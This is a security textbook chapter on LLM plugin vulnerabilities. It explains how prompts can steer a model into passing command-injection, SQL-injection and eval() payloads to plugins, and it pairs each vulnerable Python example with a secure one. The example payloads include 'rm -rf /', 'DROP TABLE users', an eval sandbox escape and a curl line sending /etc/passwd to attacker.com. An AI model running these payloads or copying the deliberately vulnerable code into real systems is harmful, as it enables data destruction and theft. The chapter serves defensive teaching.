17.4 Plugin Vulnerabilities
Understanding Plugin Vulnerabilities
Plugins extend LLM capabilities but introduce numerous security risks. Unlike the LLM itself (which is stateless), plugins interact with external systems, execute code, and manage stateful operations. Every plugin is a potential attack vector that can compromise the entire system.
Why Plugins are High-Risk
- Direct System Access: Plugins often run with elevated privileges.
- Complex Attack Surface: Each plugin adds new code paths to exploit.
- Third-Party Code: Many plugins come from untrusted sources.
- Input/Output Handling: Plugins process LLM-generated data (which is potentially malicious).
- State Management: Bugs in stateful operations lead to vulnerabilities.
Common Vulnerability Categories
- Injection Attacks: Command, SQL, path traversal.
- Authentication Bypass: Broken access controls.
- Information Disclosure: Leaking sensitive data.
- Logic Flaws: Business logic vulnerabilities.
- Resource Exhaustion: DoS via plugin abuse.
17.4.1 Command Injection
What is Command Injection?
Command injection happens when a plugin executes system commands using unsanitized user input. Since LLMs generate text based on user prompts, attackers can craft prompts that force the LLM to generate malicious commands, which the plugin then blindly executes.
Attack Chain
- User sends a malicious prompt.
- LLM generates text containing the attack payload.
- Plugin uses the LLM output in a system command.
- OS executes the attacker's command.
- System is compromised.
Real-World Risk
- Full system compromise (RCE).
- Data exfiltration.
- Lateral movement.
- Persistence mechanisms.
Vulnerable Code Example
Command injection via plugin inputs
Understanding Command Injection:
Command injection is among the most dangerous plugin vulnerabilities. It allows attackers to execute arbitrary operating system commands. If a plugin uses functions like os.system() or subprocess.run(..., shell=True) with unsanitized LLM-generated input, attackers can inject shell metacharacters to run whatever they want.
Why This Vulnerability Exists:
LLMs generate text based on user prompts. If an attacker crafts a prompt like "What's the weather in Paris; rm -rf /", the LLM might include that entire string in its output. The vulnerable plugin then executes it as a shell command.
Attack Mechanism (Vulnerable Code):
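- User sends prompt: "What's the weather in Paris; rm -rf /"
- LLM extracts location: "Paris; rm -rf /" (it's just text to the LLM).
- Plugin constructs command: curl 'https://api.weather.com/...?location=Paris; rm -rf /'
- os.system() passes the whole string to a shell. If the ; is not protected by quoting, the shell runs two commands:
  - curl '...' (the intended command).
  - rm -rf / (the attack payload, due to the ; separator).
- Because the vulnerable code in this section wraps the URL in single quotes, a working payload also closes the quote first, for example Paris'; rm -rf / #. The simplified payload is used in the text for readability.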
Shell Metacharacters Used in Attacks:
- ;: Separator (runs multiple commands).
- &&: Runs the second command if the first succeeds.
- ||: Runs the second command if the first fails.
- |: Pipes output to another command.
- `command`: Command substitution.
- $(command): Command substitution.
- &: Background execution.
Why the Secure Version Works:
- Input Validation (is_valid_location): Uses a regex to enforce a whitelist of allowed characters (here letters, numbers, and spaces). It rejects shell metacharacters like ;, |, and &.
- API Library Instead of Shell: Uses requests.get(), which makes an HTTP request directly without invoking a shell. Parameters are passed as dictionary arguments, not string concatenation.
- No Shell Parsing: The requests library URL-encodes parameters automatically. Even if "Paris; rm -rf /" reached this call, it would be sent as Paris%3B+rm+-rf+%2F in the query string and treated as literal text by the API, not as commands.
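The encoding step can be checked without sending any request. The following is a minimal sketch that uses the standard library's urllib.parse.urlencode to show the same kind of form-style encoding of a parameter dictionary; the variable names are illustrative and not part of the plugin.

```python
from urllib.parse import parse_qs, urlencode

payload = "Paris; rm -rf /"

# Encode the parameter dictionary the way a query string is built.
query_string = urlencode({"location": payload})
print(query_string)  # location=Paris%3B+rm+-rf+%2F

# The receiving side decodes it back to plain text; nothing is ever executed.
decoded = parse_qs(query_string)["location"][0]
print(decoded == payload)  # True
```

The semicolon, spaces, and slash arrive as data inside a single parameter value, so there is no point at which a shell could interpret them.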
Defense Strategy:
- Never use os.system() or subprocess.run(..., shell=True) with user-controlled input.
- Always validate input with whitelists (regex patterns for allowed characters).
- Use library functions (like requests) that don't invoke shells.
- If an external command is required, use subprocess.run() with shell=False and pass the command as a list of arguments.
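To illustrate the last point, here is a small sketch of the list form of subprocess.run(). It uses the current Python interpreter as a harmless stand-in for an external tool (an assumption made so the example runs anywhere); the helper name echo_argument is hypothetical.

```python
import subprocess
import sys

def echo_argument(value: str) -> str:
    """Run a child process with `value` as exactly one argv entry (no shell)."""
    completed = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        shell=False,          # the default, spelled out for emphasis
        capture_output=True,
        text=True,
        check=True,
    )
    return completed.stdout.rstrip("\n")

payload = "Paris; echo VULNERABLE"
echoed = echo_argument(payload)
print(repr(echoed))  # the child received the payload as one literal argument
```

Because no shell parses the command line, the ; is just another character in the argument. The called program can still misuse its arguments, so input validation remains necessary.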
Real-World Impact:
- Remote Code Execution (RCE).
- Full system compromise.
- Data exfiltration.
- Ransomware deployment.
- Backdoor installation.
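# VULNERABLE CODE
import os

class WeatherPlugin:
    def get_weather(self, location):
        # DANGEROUS: Direct command execution with user input
        command = f"curl 'https://api.weather.com/v1/weather?location={location}'"
        # os.system() runs the string through a shell and returns only the exit status
        result = os.system(command)
        return result

# Attack
# location = "Paris'; rm -rf / #"   (closes the single quote, then appends a command)
# Executes: curl '...location=Paris' ; rm -rf /
# Without the quotes around the URL, "Paris; rm -rf /" alone would be enough.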
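# SECURE VERSION
import re
import requests

class InvalidInputError(ValueError):
    """Raised when the location fails validation."""

class SecureWeatherPlugin:
    def get_weather(self, location):
        # Validate input
        if not self.is_valid_location(location):
            raise InvalidInputError()
        # Use parameterized API call (no shell is involved)
        response = requests.get(
            'https://api.weather.com/v1/weather',
            params={'location': location},
            timeout=10,
        )
        return response.json()

    def is_valid_location(self, location):
        """Validate location format"""
        # Only allow ASCII letters, digits, and spaces.
        # fullmatch() also rejects a trailing newline, which '^...$' with \s would accept.
        return bool(re.fullmatch(r'[a-zA-Z0-9 ]+', location))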
Testing Tips:
To test if your plugin is vulnerable:
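- Try location = "Paris; echo VULNERABLE". If the output contains "VULNERABLE", command injection exists.
- Try location = "Paris$(whoami)". If the output shows a username, command substitution works.
- If the plugin quotes the argument, repeat the test with a payload that closes the quote first, such as location = "Paris'; echo VULNERABLE #".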
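The same payloads can also be run against the validation step in isolation. This is a sketch under the assumption that the validator is a standalone function using the allowed-character pattern described in this section; the names LOCATION_PATTERN and samples are illustrative.

```python
import re

# Assumed whitelist: ASCII letters, digits, and spaces only.
LOCATION_PATTERN = re.compile(r"[A-Za-z0-9 ]+")

def is_valid_location(location: str) -> bool:
    # fullmatch() requires the whole string to match, including any trailing newline.
    return bool(LOCATION_PATTERN.fullmatch(location))

samples = [
    "Paris",
    "New York",
    "Paris; echo VULNERABLE",
    "Paris$(whoami)",
    "Paris'; echo VULNERABLE #",
    "Paris\n",
]
verdicts = {sample: is_valid_location(sample) for sample in samples}
for sample, accepted in verdicts.items():
    print(f"{sample!r:32} accepted={accepted}")
```

A whitelist this strict also rejects legitimate names that contain hyphens, apostrophes, or non-ASCII letters, so a real deployment would need to widen it deliberately rather than switch to a blacklist.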
SQL injection through plugins
Understanding SQL Injection in LLM Plugins:
SQL injection happens when user-controlled data (from LLM output) is concatenated directly into SQL queries instead of using parameterized queries. This lets attackers manipulate the logic, bypass authentication, extract data, or modify the database.
Why LLM Plugins are Vulnerable:
The LLM generates the query parameter based on user prompts. If a prompt says "Show me users named ' OR '1'='1", the LLM might pass that exact string to the plugin, which then runs a malicious SQL query.
Attack Mechanism (Vulnerable Code):
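- User prompt: "Search for user named ' OR '1'='1"
- LLM extracts: query = "' OR '1'='1"
- Plugin constructs SQL: SELECT * FROM users WHERE name LIKE '%' OR '1'='1%'
- SQL logic breakdown:
  - The injected quote closes the string early, so name LIKE '%' matches every non-NULL name.
  - The trailing OR '1'='1%' compares two different strings and is false, so it adds nothing here. A payload such as ' OR '1'='1' -- makes the second condition always true as well.
  - Result: Query returns ALL users.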
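The breakdown above can be reproduced with an in-memory SQLite database. This is a minimal sketch, not the plugin's real data layer: the table contents and the function name search_users_vulnerable are made up for the demonstration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",), ("carol",)])

def search_users_vulnerable(query: str) -> list:
    # DANGEROUS: the search term is pasted into the SQL text.
    sql = f"SELECT name FROM users WHERE name LIKE '%{query}%'"
    return sorted(row[0] for row in conn.execute(sql))

normal = search_users_vulnerable("ali")
injected = search_users_vulnerable("' OR '1'='1")
print(normal)    # ['alice']
print(injected)  # ['alice', 'bob', 'carol']
```

The second call never mentions any user name, yet it returns the whole table, because the quote in the payload changed the structure of the statement.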
Common SQL Injection Techniques:
- Authentication Bypass: admin' -- (comments out password check).
- Data Extraction: ' UNION SELECT username, password FROM users --.
- Boolean Blind: ' AND 1=1 -- vs ' AND 1=2 -- (leaks data bit by bit).
- Time-Based Blind: ' AND IF(condition, SLEEP(5), 0) --.
- Stacked Queries: '; DROP TABLE users; --.
Why Parameterized Queries Prevent SQL Injection:
In the secure version:
sql = "SELECT * FROM users WHERE name LIKE ?"
self.db.execute(sql, (f'%{query}%',))
- The ? is a parameter placeholder, not a string concatenation point.
- The database driver separates the SQL structure (the query pattern) from the data (the user input).
- When query = "' OR '1'='1", the database treats it as literal text to search for, not SQL code.
- The query looks for users whose name contains the characters ' OR '1'='1 (which won't exist).
- No SQL injection is possible because user input never enters the SQL parsing phase as code.
How Parameterization Works (Database Level):
- The SQL query is sent to the database first: SELECT * FROM users WHERE name LIKE :param1
- The database compiles and prepares this query structure.
- The user data (the search term) is sent separately as a parameter value.
- The database engine knows this is data, not code, and treats it as a string.
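A short sketch of the parameterized form, again against an in-memory SQLite database with made-up rows. The function name search_users_safe is hypothetical; the ? placeholder is the style used by Python's sqlite3 module.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",), ("carol",)])

def search_users_safe(query: str) -> list:
    # The SQL text is constant; the search term travels separately as a bound value.
    sql = "SELECT name FROM users WHERE name LIKE ?"
    return sorted(row[0] for row in conn.execute(sql, (f"%{query}%",)))

normal = search_users_safe("ali")
injected = search_users_safe("' OR '1'='1")
stacked = search_users_safe("x'; DROP TABLE users; --")
remaining = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
print(normal, injected, stacked, remaining)  # ['alice'] [] [] 3
```

One caveat: % and _ inside the search term still act as LIKE wildcards. That is not injection, but a plugin that needs exact substring matching would have to escape them.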
Defense Best Practices:
- Always use parameterized queries (prepared statements).
- Never concatenate user input into SQL strings.
- Use ORM frameworks (like SQLAlchemy or Django ORM) which parameterize by default.
- Validate input types (ensure strings are strings, numbers are numbers).
- Principle of least privilege: Database users should have minimal permissions.
- Never expose detailed SQL errors to users (it reveals database structure).
Real-World Impact:
- Complete database compromise.
- Credential theft (password hashes).
- PII exfiltration.
- Data deletion or corruption.
- Privilege escalation.
# VULNERABLE
class DatabasePlugin:
    def search_users(self, query):
        # DANGEROUS: String concatenation
        sql = f"SELECT * FROM users WHERE name LIKE '%{query}%'"
        return self.db.execute(sql)

# Attack
# query = "' OR '1'='1"
# SQL: SELECT * FROM users WHERE name LIKE '%' OR '1'='1%'

# SECURE VERSION
class SecureDatabasePlugin:
    def search_users(self, query):
        # Use parameterized queries
        sql = "SELECT * FROM users WHERE name LIKE ?"
        return self.db.execute(sql, (f'%{query}%',))
Testing for SQL Injection:
Try these payloads:
- query = "test' OR '1'='1" (should not return all users).
- query = "test'; DROP TABLE users; --" (should not delete table).
- query = "test' UNION SELECT @@version --" (should not reveal database version).
Type confusion attacks
Understanding Type Confusion and eval() Exploitation:
Type confusion occurs when a plugin expects one kind of input (like a math expression) but never verifies that what it receives actually is that kind of input. Python's eval() is the classic example of the danger: it executes arbitrary Python code, not just math.
Why eval() is Catastrophic:
eval() takes a string and executes it as Python code. While this works for math expressions like "2 + 2", it also works for:
- __import__('os').system('rm -rf /'): Execute shell commands.
- open('/etc/passwd').read(): Read sensitive files.
- [x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0]('id', shell=True): Escape sandboxes.
Attack Mechanism (Vulnerable Code):
- User prompt: "Calculate __import__('os').system('whoami')"
- LLM extracts: expression = "__import__('os').system('whoami')"
- Plugin executes: eval(expression)
- Python's eval runs arbitrary code.
- Result: The whoami command executes, revealing the username (proof of RCE).
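The mechanism can be observed safely by swapping the shell command for a harmless call. In this sketch the expression asks for the current working directory instead of running whoami; that substitution is an assumption made so the example has no side effects.

```python
# A "calculator" input that is not math at all.
expression = "__import__('os').getcwd()"

# eval() imports the os module and calls a function on it,
# exactly as it would for os.system(...).
result = eval(expression)
print(type(result).__name__, result)
```

Nothing in eval() distinguishes this from "2 + 2": both are just expressions to evaluate.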
Real Attack Example:
expression = "__import__('os').system('curl http://attacker.com/steal?data=$(cat /etc/passwd)')"
result = eval(expression) # Exfiltrates password file!
Why the Secure Version (AST) is Safe:
The Abstract Syntax Tree (AST) approach parses the expression into a tree structure and validates each node:
- Parse Expression: ast.parse(expression, mode='eval') converts the string to a syntax tree.
- Whitelist Validation: Only specifically allowed node types are permitted: numeric literals (ast.Constant, or ast.Num on older Python versions) and ast.BinOp.
- Operator Restriction: Only mathematical operators in the ALLOWED_OPERATORS dictionary are allowed.
- Recursive Evaluation: _eval_node() traverses the tree, evaluating only safe nodes.
- Rejection of Dangerous Nodes: Function calls (ast.Call), imports, and attribute access are all rejected.
How It Prevents Attacks:
If an attacker tries "__import__('os').system('whoami')":
- AST parses it and finds an ast.Call node (function call).
- _eval_node() raises InvalidNodeError because ast.Call isn't in the whitelist.
- Attack blocked: no code execution.
Even simpler attacks fail:
- "2 + 2; import os" → Syntax error (can't parse).
- "exec('malicious code')" → ast.Call rejected.
- "__builtins__" → ast.Name rejected (names are not in the whitelist).
Allowed Operations Breakdown:
ALLOWED_OPERATORS = {
    ast.Add: operator.add,       # +
    ast.Sub: operator.sub,       # -
    ast.Mult: operator.mul,      # *
    ast.Div: operator.truediv,   # /
}
Each operator maps to a safe Python function from the operator module, ensuring no code execution.
Defense Strategy:
- Never use eval() with user input—this is a universal security principle.
- Whitelist approach: Define exactly what's allowed (numbers and specific operators).
- AST parsing: Validate input structurally before execution.
- Sandboxing: Even "safe" code should run in an isolated environment.
- Timeout limits: Prevent 1000**100000 style DoS attacks.
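Alongside timeouts, cheap structural limits can reject oversized input before any evaluation happens. The following is a rough sketch only: the limits MAX_LENGTH, MAX_NODES, and MAX_ABS_VALUE and the function check_budget are assumptions chosen for illustration, not values from this chapter.

```python
import ast

MAX_LENGTH = 100          # hypothetical cap on input characters
MAX_NODES = 50            # hypothetical cap on syntax-tree size
MAX_ABS_VALUE = 10**12    # hypothetical cap on numeric operands

def check_budget(expression: str) -> ast.Expression:
    """Parse the expression and enforce size limits before it is evaluated."""
    if len(expression) > MAX_LENGTH:
        raise ValueError("expression too long")
    tree = ast.parse(expression, mode="eval")
    nodes = list(ast.walk(tree))
    if len(nodes) > MAX_NODES:
        raise ValueError("expression too complex")
    for node in nodes:
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            if abs(node.value) > MAX_ABS_VALUE:
                raise ValueError("operand too large")
    return tree

def is_within_budget(expression: str) -> bool:
    try:
        check_budget(expression)
        return True
    except (ValueError, SyntaxError):
        return False

print(is_within_budget("2 + 2"))                 # True
print(is_within_budget("1 + " * 100 + "1"))      # False (too long)
print(is_within_budget("99999999999999 * 2"))    # False (operand too large)
```

These checks bound the input, not the running time, so they complement a timeout or an isolated worker process rather than replace it.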
Real-World Impact:
- Remote Code Execution (RCE).
- Full system compromise.
- Data exfiltration.
- Lateral movement to internal systems.
- Crypto mining or botnet deployment.
Prerequisites:
- Understanding of Python's AST module.
- Knowledge of Python's operator module.
- Awareness of Python introspection risks (__import__, __builtins__).
class CalculatorPlugin:
    def calculate(self, expression):
        # VULNERABLE: eval() with user input
        result = eval(expression)
        return result

# Attack
# expression = "__import__('os').system('rm -rf /')"
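# SECURE VERSION
import ast
import operator

class InvalidExpressionError(ValueError):
    """The input could not be parsed as an expression."""

class UnsupportedOperatorError(InvalidExpressionError):
    """The expression uses an operator outside the whitelist."""

class InvalidNodeError(InvalidExpressionError):
    """The expression contains a node type outside the whitelist."""

class SecureCalculatorPlugin:
    ALLOWED_OPERATORS = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
    }

    def calculate(self, expression):
        """Safely evaluate mathematical expression"""
        try:
            tree = ast.parse(expression, mode='eval')
        except (SyntaxError, ValueError) as exc:
            # Only parse failures are translated; validation errors propagate unchanged
            raise InvalidExpressionError() from exc
        return self._eval_node(tree.body)

    def _eval_node(self, node):
        """Recursively evaluate AST nodes"""
        # ast.Constant replaces the deprecated ast.Num; accept plain int/float only
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        elif isinstance(node, ast.BinOp):
            op_type = type(node.op)
            if op_type not in self.ALLOWED_OPERATORS:
                raise UnsupportedOperatorError()
            left = self._eval_node(node.left)
            right = self._eval_node(node.right)
            return self.ALLOWED_OPERATORS[op_type](left, right)
        else:
            raise InvalidNodeError()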
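Alternative Solutions (and Their Limits):
- sympy library: sympy.sympify(expression) parses mathematical expressions, but its documentation warns that it uses eval() internally, so it must not be given unsanitized input.
- numexpr library: Fast numerical expression evaluation. Treat it as a performance tool rather than a security boundary, and validate input before passing it in.
- restricted eval: Use ast.literal_eval() for literals only (no operators).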
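A quick sketch of what ast.literal_eval() accepts and rejects on current Python 3 versions. The wrapper try_literal is a hypothetical helper that turns the exception into a readable marker.

```python
import ast

def try_literal(text: str):
    """Return the parsed literal, or a short marker string if it is rejected."""
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError) as exc:
        return f"rejected: {type(exc).__name__}"

as_list = try_literal("[1, 2, 3]")
as_math = try_literal("2 + 2")
as_call = try_literal("__import__('os').system('id')")
print(as_list)  # [1, 2, 3]
print(as_math)  # rejected: ValueError
print(as_call)  # rejected: ValueError
```

This makes literal_eval() suitable for parsing data such as numbers, lists, and dictionaries, but not for a calculator, since arithmetic between ordinary numbers is refused.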
Testing Tips:
Test with these payloads:
- expression = "__import__('os').system('echo PWNED')" (should raise InvalidNodeError).
- expression = "exec('print(123)')" (should fail).
- expression = "2 + 2" (should return 4 safely).
17.4.2 Logic Flaws
Race conditions in plugin execution
Understanding Race Conditions:
Race conditions happen when multiple threads or processes access shared resources—like account balances or database records—simultaneously without proper synchronization. The outcome depends on who wins the unpredictable "race", leading to data corruption or vulnerabilities.
Why Race Conditions are Dangerous in LLM Systems:
LLM plugins often handle multiple requests at once. If an attacker can trick the LLM into invoking a plugin function multiple times simultaneously (via parallel prompts or rapid requests), they can exploit race conditions to:
- Bypass balance checks.
- Duplicate transactions.
- Corrupt data integrity.
- Escalate privileges.
The Vulnerability: Time-of-Check-Time-of-Use (TOCTOU)
def withdraw(self, amount):
    # Check balance (Time of Check)
    if self.balance >= amount:
        time.sleep(0.1)  # Processing delay
        # Withdraw money (Time of Use)
        self.balance -= amount
        return True
    return False
Attack Timeline:
| Time | Thread 1 | Thread 2 | Balance |
|---|---|---|---|
| T0 | Start withdraw(500) | | 1000 |
| T1 | Check: 1000 >= 500 ✓ | | 1000 |
| T2 | | Start withdraw(500) | 1000 |
| T3 | | Check: 1000 >= 500 ✓ | 1000 |
| T4 | sleep(0.1)... | sleep(0.1)... | 1000 |
| T5 | balance = 1000 - 500 | | 500 |
| T6 | | balance = 1000 - 500 | 500 |
| T7 | Return True | Return True | 500 |
The Problem:
- Both threads checked the balance when it was 1000.
- Both passed the check.
- Both withdrew 500.
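- Result: $1000 left the account, but the recorded balance only dropped to 500, because the second write overwrote the first (a lost update). With larger amounts the check itself is defeated: two concurrent withdrawals of $600 both pass the check against 1000 and overdraw the account, although the second should have failed.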
Real-World Exploitation:
Attacker sends two simultaneous prompts:
Prompt 1: "Withdraw $500 from my account"
Prompt 2: "Withdraw $500 from my account"
Both execute in parallel:
- Both check balance (1000) and pass.
- Both withdraw 500.
- Result: The attacker receives $1000 in total, while the recorded balance can still show $500.
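The 500 example depends on both threads writing back a stale value, which is hard to reproduce on demand. A variant that is easier to observe uses two withdrawals of 600: only one can be valid, yet both pass the check. The sketch below forces the interleaving with a threading.Barrier in place of the sleep; the class name VulnerableAccount and the pause hook are assumptions made for the demonstration.

```python
import threading

class VulnerableAccount:
    def __init__(self, balance, pause):
        self.balance = balance
        self._pause = pause  # stands in for the processing delay

    def withdraw(self, amount):
        if self.balance >= amount:   # time of check
            self._pause()            # both threads wait here after passing the check
            self.balance -= amount   # time of use
            return True
        return False

# The barrier releases only once both threads have passed the balance check.
barrier = threading.Barrier(2, timeout=5)
account = VulnerableAccount(1000, barrier.wait)
results = []

def attempt():
    results.append(account.withdraw(600))

threads = [threading.Thread(target=attempt) for _ in range(2)]
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()

print(results, account.balance)  # both calls succeed; the balance typically ends at -200
```

Both calls return True even though the account could only cover one of them, which is exactly the outcome the balance check was supposed to prevent.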
The Solution: Threading Lock
import threading

class SecureBankingPlugin:
    def __init__(self):
        self.balance = 1000
        self.lock = threading.Lock()  # Critical section protection

    def withdraw(self, amount):
        with self.lock:  # Acquire lock (blocks other threads)
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False
        # Lock automatically released when exiting 'with' block
How Locking Prevents the Attack:
| Time | Thread 1 | Thread 2 | Balance |
|---|---|---|---|
| T0 | Acquire lock ✓ | | 1000 |
| T1 | Check: 1000 >= 500 ✓ | Waiting for lock... | 1000 |
| T2 | balance = 500 | Waiting for lock... | 500 |
| T3 | Release lock, Return True | Acquire lock ✓ | 500 |
| T4 | | Check: 500 >= 500 ✓ | 500 |
| T5 | | balance = 0 | 0 |
| T6 | | Release lock, Return True | 0 |
Result: Correct behavior—both withdrawals succeed because there was enough money.
With withdrawal of $600 each:
- Thread 1 withdraws $600 (balance = $400).
- Thread 2 tries to withdraw $600, check fails (400 < 600).
- Second withdrawal correctly rejected.
Critical Section Principle:
The lock creates a "critical section":
- Only one thread can be inside at a time.
- Check and modify operations are atomic (indivisible).
- No race condition possible.
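The $600 scenario can be run end to end to confirm the critical section behaves as described. This is a self-contained sketch; the class name LockedAccount is illustrative, and the short sleep is kept inside the lock to show that even a slow critical section stays correct.

```python
import threading
import time

class LockedAccount:
    def __init__(self, balance):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw(self, amount):
        with self._lock:               # check and update happen as one unit
            if self.balance >= amount:
                time.sleep(0.05)       # simulated processing, still inside the lock
                self.balance -= amount
                return True
            return False

account = LockedAccount(1000)
results = []

def attempt():
    results.append(account.withdraw(600))

threads = [threading.Thread(target=attempt) for _ in range(2)]
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()

print(sorted(results), account.balance)  # [False, True] 400
```

Whichever thread acquires the lock first succeeds; the other sees the updated balance of 400 and is rejected.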
Other Race Condition Examples:
1. Privilege Escalation:
# VULNERABLE
def promote_to_admin(user_id):
    if not is_admin(user_id):  # Check
        # Attacker promotes themselves using race condition
        user.role = 'admin'  # Modify
2. File Overwrite:
# VULNERABLE
if not os.path.exists(file_path):  # Check
    # Attacker creates file between check and write
    write_file(file_path, data)  # Use
Best Practices:
- Use Locks: threading.Lock() for thread safety.
- Atomic Operations: Use database transactions, not separate read-then-write steps.
- Optimistic Locking: Use version numbers to detect concurrent modifications.
- Pessimistic Locking: Lock resources before access (like SELECT FOR UPDATE).
- Idempotency: Design operations so they can be safely retried.
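Optimistic locking is the least familiar item in this list, so here is a minimal sketch of it using an in-memory SQLite table. The schema (a version column on accounts) and the function names are assumptions made for the example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER, version INTEGER)"
)
conn.execute("INSERT INTO accounts VALUES (1, 1000, 0)")
conn.commit()

def read_account(account_id):
    """Return (balance, version) as seen at this moment."""
    return conn.execute(
        "SELECT balance, version FROM accounts WHERE id = ?", (account_id,)
    ).fetchone()

def withdraw_if_unchanged(account_id, amount, seen_balance, seen_version):
    """Apply the withdrawal only if nobody modified the row since it was read."""
    if seen_balance < amount:
        return False
    cursor = conn.execute(
        "UPDATE accounts SET balance = ?, version = version + 1 "
        "WHERE id = ? AND version = ?",
        (seen_balance - amount, account_id, seen_version),
    )
    conn.commit()
    return cursor.rowcount == 1  # 0 rows means the version moved on

# Two requests read the same snapshot, then both try to write.
snapshot_a = read_account(1)
snapshot_b = read_account(1)
first = withdraw_if_unchanged(1, 600, *snapshot_a)
second = withdraw_if_unchanged(1, 600, *snapshot_b)
final_state = read_account(1)
print(first, second, final_state)  # True False (400, 1)
```

The second request is not blocked; it simply fails to match the stale version and can re-read and retry, at which point the balance check rejects it.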
Database-Level Solution:
Instead of application-level locks, use database transactions:
def withdraw(self, amount):
    with db.transaction():  # Database ensures atomicity
        current_balance = db.query(
            "SELECT balance FROM accounts WHERE id = ? FOR UPDATE",
            (self.account_id,)
        )
        if current_balance >= amount:
            db.execute(
                "UPDATE accounts SET balance = balance - ? WHERE id = ?",
                (amount, self.account_id)
            )
            return True
        return False
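The FOR UPDATE clause locks the selected row, so other transactions cannot modify it or lock it themselves until this transaction commits or rolls back. Whether plain, non-locking reads are also blocked depends on the database and its isolation level.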
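SQLite has no FOR UPDATE clause, so a runnable illustration needs a different technique. The sketch below swaps in a single conditional UPDATE that performs the check and the subtraction in one statement; this is an alternative to row locking, not the same mechanism, and the table layout is assumed for the example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER)")
conn.execute("INSERT INTO accounts VALUES (1, 1000)")
conn.commit()

def withdraw(account_id: int, amount: int) -> bool:
    # 'with conn' commits on success and rolls back if an exception is raised.
    with conn:
        cursor = conn.execute(
            "UPDATE accounts SET balance = balance - ? "
            "WHERE id = ? AND balance >= ?",
            (amount, account_id, amount),
        )
    # The row is only touched when the balance was sufficient.
    return cursor.rowcount == 1

first = withdraw(1, 600)
second = withdraw(1, 600)
balance = conn.execute("SELECT balance FROM accounts WHERE id = 1").fetchone()[0]
print(first, second, balance)  # True False 400
```

Because the comparison lives in the WHERE clause, there is no gap between checking the balance and changing it for another request to slip into.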
Testing for Race Conditions:
import threading

def test_race_condition():
    plugin = BankingPlugin()  # Vulnerable version
    plugin.balance = 1000
    results = []

    def withdraw_600():
        # Two withdrawals of 600 cannot both be valid against a balance of 1000
        results.append(plugin.withdraw(600))

    # Create two threads that withdraw simultaneously
    t1 = threading.Thread(target=withdraw_600)
    t2 = threading.Thread(target=withdraw_600)
    t1.start()
    t2.start()
    t1.join()
    t2.join()
    print(f"Results: {results}, final balance: {plugin.balance}")
    # Vulnerable: both calls can return True, leaving a negative balance
    # Secure: exactly one call returns True and the balance ends at 400
Prerequisites:
- Understanding of multithreading concepts.
- Knowledge of critical sections and mutual exclusion.
- Familiarity with Python's threading module.
import threading
import time

# VULNERABLE: Race condition
class BankingPlugin:
    def __init__(self):
        self.balance = 1000

    def withdraw(self, amount):
        # Check balance
        if self.balance >= amount:
            time.sleep(0.1)  # Simulated processing
            self.balance -= amount
            return True
        return False

# Attack: Call withdraw() twice simultaneously
# Result: both checks pass before either subtraction runs,
# e.g. two withdraw(600) calls overdraw a balance of 1000

# SECURE VERSION with locking
class SecureBankingPlugin:
    def __init__(self):
        self.balance = 1000
        self.lock = threading.Lock()

    def withdraw(self, amount):
        with self.lock:
            if self.balance >= amount:
                self.balance -= amount
                return True
            return False
Real-World Impact:
- 2012 - Citibank: Race condition allowed double withdrawals from ATMs.
- 2016 - E-commerce: Concurrent coupon use drained promotional budgets.
- 2019 - Binance: $41M stolen via coordinated attack exploiting multiple security weaknesses.
Key Takeaway:
In concurrent systems (like LLM plugins handling multiple requests), check-then-act patterns are inherently unsafe without synchronization. Always protect shared state with locks, transactions, or atomic operations.
17.4.3 Information Disclosure
Excessive data exposure
# VULNERABLE: Returns too much data
class UserPlugin:
    def get_user(self, user_id):
        user = self.db.query("SELECT * FROM users WHERE id = ?", (user_id,))
        return user  # Returns password hash, email, SSN, etc.

# SECURE: Return only necessary fields
class SecureUserPlugin:
    def get_user(self, user_id, requester_id):
        # Fetch only the columns that may ever be returned
        user = self.db.query(
            "SELECT id, username, display_name, email FROM users WHERE id = ?",
            (user_id,)
        )
        # Filter sensitive fields
        if requester_id != user_id:
            # Return public profile only
            return {
                'id': user['id'],
                'username': user['username'],
                'display_name': user['display_name']
            }
        else:
            # Return full profile for own user
            # Still don't return password_hash or SSN
            return {
                'id': user['id'],
                'username': user['username'],
                'display_name': user['display_name'],
                'email': user['email']
            }
Error message leakage
# VULNERABLE: Detailed error messages
class DatabasePlugin:
    def query(self, sql):
        try:
            return self.db.execute(sql)
        except Exception as e:
            return f"Error: {str(e)}"

# Attack reveals database structure
# query("SELECT * FROM secret_table")
# Error: (mysql.connector.errors.ProgrammingError) (1146,
# "Table 'mydb.secret_table' doesn't exist")

# SECURE: Generic error messages
import logging

logger = logging.getLogger(__name__)

class SecureDatabasePlugin:
    def query(self, sql):
        try:
            return self.db.execute(sql)
        except Exception as e:
            # Log detailed error securely (server side only)
            logger.error(f"Database error: {str(e)}")
            # Return generic message to user
            return {"error": "Database query failed"}
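A generic message is harder to support unless it can be tied back to the detailed log entry. One common approach, sketched here with a hypothetical helper safe_call and an assumed logger name, is to attach a random reference ID to both the log record and the response.

```python
import logging
import uuid

logger = logging.getLogger("plugin.errors")  # assumed logger name

def safe_call(operation):
    """Run `operation`; on failure, log details and return only a generic error."""
    try:
        return {"ok": True, "result": operation()}
    except Exception:
        error_id = uuid.uuid4().hex
        # Full traceback stays in the server-side log, keyed by error_id.
        logger.exception("plugin operation failed [error_id=%s]", error_id)
        return {"ok": False, "error": "Database query failed", "error_id": error_id}

def failing_operation():
    raise RuntimeError("Table 'mydb.secret_table' doesn't exist")

response = safe_call(failing_operation)
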